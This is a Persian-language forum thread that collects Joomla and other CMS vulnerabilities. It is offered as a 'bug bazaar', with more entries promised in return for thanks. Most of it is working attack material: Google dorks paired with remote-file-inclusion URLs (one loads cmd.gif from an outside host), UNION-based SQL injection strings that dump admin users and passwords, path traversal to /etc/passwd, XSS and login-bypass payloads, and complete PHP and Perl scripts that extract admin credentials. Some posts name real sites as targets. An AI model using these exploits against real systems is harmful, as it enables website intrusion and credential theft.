spyman

_.-*بازار باگ جوملا مخلوت ( جدام نمیشه . درهم و برهمه )*-._

52 پست در این موضوع

ارسال شده در (ویرایش شده)

سلام خدمت همه دوستان

هک از طریق injection و شل استفاده میشه

این تاپیک رو فقط به باگهای جوملا اختصاص دادیم که همگی شما با تمامی هک از این شکل ها و بستن آنها در سایت خود و مشکلات جومیلا آشنا شوید:

در این تاپیک باگهای گوناگونی که در CMS ها مختلف کشف میشه و در سایت های امنیتی گزارش داده می شه قرار می گیرد.

تا هم یه بانک اطلاعاتی خوب به روز و کاربردی برای بچه های joomlaforum.ir باشه و هم سریع در دسترس قرار بگیره! thumbsupsmileyanim.gif

اطلاعیه

خوب تا صفحه 5 داشته باشین تا تشکر شده من به 135 برسه . تازه 30% از باگارو گزاشتم . اگه تشکرم برسه بقیش میزارم

قوانین تاپیک :

1- جواب پیشنهاد و انتقاد شما در تایپیک _.-*سوالات هک و امنیت*-._ قرار داده شود .

2- آموزش هک به تایپیک _.-* آموزش قدم به قدم هک *-._ بروید .

4- برای این که جولوی هک شدن بگیری برین این جا_.-* دیوار آتش با برای جوملا *-._

5 -_.-*نفوذ به سیستم مدیریت محتوای Joomla به همراه مثال*-._

7 - در صورتی که با پستی موافق هستید فقط دگمه تشکر رو بزنید تا مدیریت هم از امار موافق اون مورد اطلاع پیدا کنه.

8 - تمرینات تو گروه هک انجام میدم و کسای که میخوان بیان پیام خصوصی بدن .

ویرایش شده در توسط spyman
1 کاربر پسند دیده است

Share this post


Link to post
Share on other sites
آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش لاراول آموزش cPanel آموزش php آموزش فرم ساز RSform آموزش ساخت ربات جذب ممبر آموزش ساخت ربات دوستیابی آموزش ساخت ربات فروشگاهی برای ووکامرس آموزش طراحی سایت داینامیک با php آموزش بخش پشتیبانی با rsticket

اینم سری اول



inurl:"com_admin"

administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_simpleboard
/components/com_simpleboard/file_upload.php?sbp=shell

inurl:"com_hashcash"
/components/com_hashcash/server.php?mosConfig_absolute_path=shell

inurl:"com_htmlarea3_xtd-c"

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell

inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell

inurl:"com_performs"
components/com_performs/performs.php?mosConfig_absolute_path=shell

inurl:"com_forum"
/components/com_forum/download.php?phpbb_root_path=

inurl:"com_pccookbook"
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_extcalendar
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell

inurl:"minibb"
components/minibb/index.php?absolute_path=shell

inurl:"com_smf"
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=shell

inurl:"com_pollxt"
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

inurl:"com_loudmounth"
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell

inurl:"com_videodb"
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l

inurl:index.php?option=com_pcchess
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell

inurl:"com_multibanners"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell

inurl:"com_a6mambohelpdesk"
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l

inurl:"com_colophon"
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell

inurl:"com_mgm"
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

inurl:"com_mambatstaff"
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell

inurl:"com_securityimages"
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

/components/com_securityimages/lang.php?mosConfig_absolute_path=shell

inurl:"com_artlinks"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell

inurl:"com_galleria"
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell

inurl:"com_akocomment"
/akocomments.php?mosConfig_absolute_path=shell

inurl:"com_cropimage"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell

inurl:"com_kochsuite"
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell

inurl:"com_comprofiler"
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell

inurl:"com_zoom"
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell

/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell

inurl:"com_serverstat"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll

inurl:"com_fm"
components/com_fm/fm.install.php?lm_absolute_path=shell

inurl:com_mambelfish
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell

inurl:com_lmo
components/com_lmo/lmo.php?mosConfig_absolute_path=shell

inurl:com_linkdirectory
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell

inurl:com_mtree
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell

inurl:com_jim
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell

inurl:com_webring
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell

inurl:com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

inurl:com_babackup
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell

inurl:com_lurm_constructor
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell

inurl:com_mambowiki
components/com_mambowiki/ MamboLogin.php?IP=shell

inurl:com_a6mambocredits
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell

inurl:com_phpshop
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell

inurl:com_cpg
components/com_cpg/cpg.php?mosConfig_absolute_path=shell

inurl:com_moodle
components/com_moodle/moodle.php?mosConfig_absolute_path=shell

inurl:com_extended_registration
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell

inurl:com_mospray
components/com_mospray/scripts/admin.php?basedir=shell

inurl:com_bayesiannaivefilter
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell

inurl:com_uhp
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell

inurl:com_peoplebook
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

inurl:com_mmp
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

inurl:com_reporter
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

inurl:com_madeira
/components/com_madeira/img.php?url=shell

inurl:com_jd-wiki
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell

inurl:com_bsq_sitestats
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
/com_bsq_sitestats/external/rssfeed.php?baseDir=she

Share this post


Link to post
Share on other sites

اینم دومی

Security Reason LINK




Topic :
The Joomla ACStartSeite component SQL injection vulnerability

Arrow WLB : WLB-2010020103 (About)
Arrow SecurityAlert : None
Arrow Date : 2010-02-19
Arrow Credit : AtT4CKxT3rR0r1ST
Arrow SecurityRisk : Medium Security Risk Medium (About)
Arrow Remote : Yes
Arrow Local : No
Arrow Status : Bug

Arrow History : [2010-02-19] Started

Arrow Affected software : The Joomla ACStartSeite component



Arrow Text :


Joomla Component com_acstartseite Sql Injection Vulnerability
==============================================================
#######
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [sec Attack Team]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : inurl:"com_acstartseite"

#######

===[ Exploit ]===

www.site.com/index.php?option=com_acstartseite&Itemid=null[sql]&lan
g=de


www.site.com/index.php?option=com_acstartseite&Itemid=null+and+1=2+unio
n+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,1
6,17+from+mos_users&lang=de

#######

Share this post


Link to post
Share on other sites

اینم سومی

Core Joomla Community Polls Component 'controller' Parameter Local File Include Vulnerability

Security Focus LINK



Bugtraq ID: 38330
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Feb 19 2010 12:00AM
Updated: Feb 22 2010 04:02PM
Credit: kaMtiEz
Vulnerable: Core Joomla Community Polls 1.5.2
Not Vulnerable: Core Joomla Community Polls 1.5.3


Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00

Share this post


Link to post
Share on other sites

4

Amelia CMS remote SQL injection

Security Reason LINK



Arrow Topic :
Amelia CMS remote SQL injection

Arrow WLB : WLB-2010020113 (About)
Arrow SecurityAlert : None
Arrow Date : 2010-02-23
Arrow Credit : Ariko-Security
Arrow SecurityRisk : Medium Security Risk Medium (About)
Arrow Remote : Yes
Arrow Local : No
Arrow Status : Bug

Arrow History : [2010-02-23] Started

Arrow Affected software : Amelia CMS



Arrow Text :

# Title: [sql injection vulnerability in Amelia CMS]
# Date: [10.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.ameliadesign.eu/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]


============ { Ariko-Security - Advisory #3/2/2010 } =============

SQL injection vulnerability in Amelia CMS


Vendors Description of Software:
#
http://www.ameliadesign.eu/index.php?page=1322&lang=eng&cnt=service
s

Dork:
# N/A

Application Info:
# Name: Amelia CMS
# Versions: ALL

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High

Fix:
# N/A

Time Table
# 10/02/2009 - Vendor notified.


Input passed via the "page" parameter to index.php is not
properly

sanitised before being used in a SQL query and it is possible to get

sensitive information using for example Time-Base Blind SQL Injection

attacks.


Solution:
# Input validation of "page" parameter should be corrected.


Vulnerability:
#
http://www.[site]/index.php?page=1322[sqli]&lang=eng&cnt=services

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
Advisory:
#http://www.ariko-security.com/feb2010/ad453.html
# Contacts: support[-at-]ariko-security.com



Share this post


Link to post
Share on other sites

.

Article Friendly <= SQL Injection Vulnerability

Security Reason Link




Arrow Topic :
Article Friendly <= SQL Injection Vulnerability

Arrow WLB : WLB-2010020122 (About)
Arrow SecurityAlert : None
Arrow Date : 2010-02-23
Arrow Credit : SkuLL-HacKeR
Arrow Added by : SecurityReason
Arrow SecurityRisk : Medium Security Risk Medium (About)
Arrow Remote : Yes
Arrow Local : No
Arrow Status : Bug

Arrow History : [2010-02-23] Started

Arrow Affected software : Article Friendly



Arrow Text :

=========
[!] Article Friendly <= SQL Injection Vulnerability
==========

# Author : SkuLL-HacKeR
# Site p4ge : http://www.articlefriendly.com/
# # GreetZ : AmiZya - Stack - djekmani4ever
# Dork : Powered by Article DashBoard #
# Sh0w CreW : Jiko HxH - THE SAD HACKER
# My Home: www.no-exploit.com & # wWw.Owned-m.CoM
# T3st3d on: MacBook & Windows XP SP3

##############

===[ #-/Expl0it Code\-# : ]===

# SQL Injection Vulnerability :

#-/ Link Admin: www.Target.com/[scriptarticleLoser]/admin/

#-/ 0r :
www.Target.com[script-article-Loser]/admin/index.php?filename=adminlogin

#-/Username : admin' or 'a'='a

#-/Password : adminKas0l

##############

http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
;)

Share this post


Link to post
Share on other sites

Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability

Link


view source print? #!/usr/bin/php <?php ini_set("max_execution_time",0); print_r(' ########################################################################### [»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability ########################################################################### [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie [»] Dork: inurl:index.php?option=com_joomlaconnect_be ########################################################################### ########################################################################### # # Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit # [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 # # ########################################################################### '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>


Share this post


Link to post
Share on other sites

 	 		 			 Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1  

link

یه نمونه

http://www.eaa-mauritius.com/phpBaza...member&value=1

در ضمن می تونید دورک های تو سایتهای دیگر هم استفاده کنید.

Share this post


Link to post
Share on other sites

اینم هست یه سری بدون نمونه

# googledork : "Calendar programming by AppIdeas.com" filetype:php

http://[sERVER]/[PATH]/week.php?LoName=<script>alert(67)</script>

http://[sERVER]/[PATH]/month.php?LoName=<script>alert(788)</script>

http://[sERVER]/[PATH]/event.php?AddressLink="><script>alert(6767)</script><"

SQL Injections:

http://[sERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[sERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[sERVER]/[PATH]/event.php?ID=(1=1)

 

[/left]

[/color][color=#0000BB]http[/color][color=#007700]:[/color][color=#FF8000]//[sERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[sql]

[/color][color=#0000BB]http[/color][color=#007700]:[/color][color=#FF8000]//[sERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [sql]

[/color][color=#0000BB]http[/color][color=#007700]:[/color][color=#FF8000]//[sERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [sql]

[/color][color=#0000BB]http[/color][color=#007700]:[/color][color=#FF8000]//[sERVER]/[PATH]/admin/delCategory.php?LocationID=x' [sql] [/color][/color]

Share this post


Link to post
Share on other sites

WebAdministrator Lite CMS SQL Injection Vulnerability

LINK


============ { Ariko-Security - Advisory #5/2/2010 } =============

SQL injection vulnerability in WebAdministrator Lite CMS


Vendor's Description of Software:
# http://jskinternet.pl/portal/jsk/3/Oferta.html

Dork:
# webadministrator lite

Application Info:
# Name: WebAdministrator Lite CMS
# Versions: LITE

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: medium

Fix:
# N/A

Time Table:
# 25/02/2010 - Vendor notified.
# 25/02/2010 - Vendor response "we will not release FIX for LITE, soon

new version"....


Input passed via the "s" parameter to download.php is not properly

sanitised before being used in a SQL query.

Solution:
# Input validation of "s" parameter should be corrected.


Vulnerability:
# http://[site]/download.php?s=[sqli]&id=2324

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
# Contacts: support[-at-]ariko-security.com


Ariko-Security
Maciej Gojny
vuln@ariko-security.com
tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)


Share this post


Link to post
Share on other sites

Joomla 1.5.15 Persistant XSS in 'Author Alias

Security Reason





Topic : Joomla 1.5.15 Persistant XSS in 'Author Alias'

WLB : WLB-2010020137 (About)

SecurityAlert : None
Date : 2010-02-26

Credit : coffey
Added by : SecurityReason
SecurityRisk : Low (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-26] Started


Affected software : Joomla 1.5.15





Text :

date -------------[ 24.02.2010
prog -------------[ Joomla 1.5.15
vuln -------------[ Persistant XSS in 'Author Alias'
source -------------[ www.joomla.org
by -------------[ coffey

poc
Persistant XSS in 'Author Alias' when adding new Article (logged only).

/administrator/index.php?option=com_content&sectionid=0&task=edit&a
mp;cid[]=46

$details_created_by_alias="><script>alert(1)</script>


Share this post


Link to post
Share on other sites

PBBoard 2.0.5 add administrator and shell upload vulnerabilities

Security Reason



Topic : PBBoard 2.0.5 add administrator and shell upload vulnerabilities

WLB : WLB-2010020135 (About)

SecurityAlert : None
Date : 2010-02-26

Credit : indoushka
SecurityRisk : High (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-26] Started


Affected software : PBBoard 2.0.5





Text :

===========================================================================
=============
| # Title : PBBoard Version 2.0.5 Mullti Vulnerability
| # Author : indoushka

| # email : indoushka@hotmail.com

| # Home : www.iq-ty.com

| # Web Site : http://www.pbboard.com/PBBoard_v2.0.5.zip

| # Dork : Powered by PBBoard© 2009 Version 2.0.5


| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4
Ubuntu)
| # Bug : Mullti

====================== Exploit By indoushka
=================================
# Exploit :

1- Add Admin:

http://127.0.0.1/upload/setup/install/?step=4

2- upload Vulnerability:

Fter register go to

http://127.0.0.1/upload/index.php?page=usercp&control=1&avatar=1&am
p;main=1

After Upload go to 2 find

http://127.0.0.1/Upload/download/avatar/(Ev!l name.php)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix
==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir)
SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z
(www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r
IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me *
www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net
---------------------------------------------------------------------------
-----------------------------------


Share this post


Link to post
Share on other sites

Joomla Component com_hdflvplayer SQL injection exploit


#!/usr/bin/perl -w

###############################################################################################
#
# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : 15 February, 2010
#
###############################################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$t
ukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}


Share this post


Link to post
Share on other sites

WSC CMS (Bypass) SQL Injection Vulnerability

Security Reason





Arrow Topic :
WSC CMS (Bypass) SQL Injection Vulnerability

Arrow SecurityAlert : 7045
Arrow CVE : CVE-2010-0698
Arrow CWE : CWE-89
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : Yes
Arrow Credit : Phenom
Arrow Published : 26.02.2010

Arrow Affected Software : dynamicsoft:wsc_cms:2.2



Arrow Advisory Content :

# Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability
# Date: 2010-02-19
# Author: Phenom
# Software Link:
# Version:
# Tested on: windows xp sp3
# CVE :
# Code :

------------------------------------------------------
------------------------------------------------------

_____ _
| __ | |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ \ / _ \ '_ / _/| '_ ` _ \
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|


------------------------------------------------------
------------------------------------------------------

############### WSC CMS (Bypass) SQL Injection Vulnerability
###################################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
####### Exploit
#############################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or as password
#
#############################################################

Share this post


Link to post
Share on other sites

Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability

Security Reason





Arrow Topic :
Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability

Arrow SecurityAlert : 7043
Arrow CVE : CVE-2010-0694
Arrow CWE : CWE-89
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : No
Arrow Credit : FL0RiX
Arrow Published : 26.02.2010

Arrow Affected Software : percha:com_perchagallery:1.4 and previous versions



Arrow Advisory Content :

# Joomla Component com_perchagallery SQL Injection Vulnerability

# Author :FL0RiX

#

# Name : com_perchagallery
#
# Bug Type : SQL Injection

#

# Infection : Admin login bilgileri alinabilir.

#

# Demo Vuln :
#
#
http://www.community.phoenixmbs.com/index.php?option=com_perchagallery&view
=editunidad&id=[EXPLOIT]
#
#EXPLOIT :
null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/*
*/from/**/jos_users--

########################################################################

Share this post


Link to post
Share on other sites

Joomla Component com_yanc SQL Injection Vulnerability

LINK


==============================================================================
[»] Joomla com_yanc Remote Sql Injection Vulnerability
==============================================================================

[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
[»] Dork: [inurl:index.php?option=com_yanc "listid" ]
###########################################################################
===[ Exploit ]===

[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################


Share this post


Link to post
Share on other sites

Joomla Component com_liveticker Blind SQL Injection Vulnerability

LINK


#!/usr/bin/php
<?php
ini_set("max_execution_time",0);
print_r('
#####################################################################
[»] Joomla com_liveticker Remote Blind Injection Vulnerability
#####################################################################
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com ]
[»] Site: [ sec-war.com/cc>]
[»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie
[»] Dork: [ inurl:index.php?option=com_liveticker "viewticker" ]
######################################################################
######################################################################
# Joomla com_liveticker (tid) Blind SQL Injection Exploit
# [x] Usage: Snakespc.php "http://url/index.php?option=com_liveticker&task=viewticker&tid=1"
######################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>


Share this post


Link to post
Share on other sites

Trixbox 2.2.4 honecDirectory.php SQL Injection

Security Reason




Arrow Topic :
Trixbox 2.2.4 honecDirectory.php SQL Injection

Arrow SecurityAlert : 7053
Arrow CVE : CVE-2010-0702
Arrow CWE : CWE-89
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : Yes
Arrow Credit : NorSlacker
Arrow Published : 28.02.2010

Arrow Affected Software : fonality:trixbox:2.2.4



Arrow Advisory Content :

# Exploit Title: Trixbox PhonecDirectory.php SQL Injection
# Date: 18.02.2010
# Author: NorSlacker
# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://trixbox/cisco/services/PhoneDirectory.php?ID=1 [sql INJECTION]

Example (Grab users / password hashes from sugarcrm)
http://trixbox/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT
id,user_hash AS 'first_name',last_name,phone_home,user_name AS
'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1'
GROUP BY 'id


PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the
dial
# key functionality
if ($ID) {
$PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";

$Query = "SELECT id, first_name, last_name, phone_home, phone_work,
phone_mobile, phone_other ";
$Query .= "FROM contacts WHERE id = '$ID ";
$Query .= "ORDER BY last_name ";
$SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);

...

}

#norslacker [at] gmail [dot] com



Share this post


Link to post
Share on other sites

Omnidocs SQL injection Vulnerability

Security Reason



Arrow Topic :
Omnidocs SQL injection Vulnerability

Arrow SecurityAlert : 7051
Arrow CVE : CVE-2010-0701
Arrow CWE : CWE-89
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : Yes
Arrow Credit : thebluegenius
Arrow Published : 28.02.2010

Arrow Affected Software : newgensoft:omnidocs



Arrow Advisory Content :

--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA

---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
By :Thebluegenius.
Email :rajsm@isac.org.in
Blog :thebluegenius.com.
---------------------------------------------------

Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating,
capturing, managing, delivering and archiving large volumes of documents
and contents. Also integrates seamlessly with other enterprise
applications.

------------------
Vulnerability
------------------

Affected URL: http://IPaddressOrDomain/omnidocs/ForceChangePassword.jsp

Command: ' or 'a' = 'a'
Confirmed SQL Injection error : ORA-00907: missing right parenthesis


Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL Injection error : ORA-01756: quoted string not properly
terminated

-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
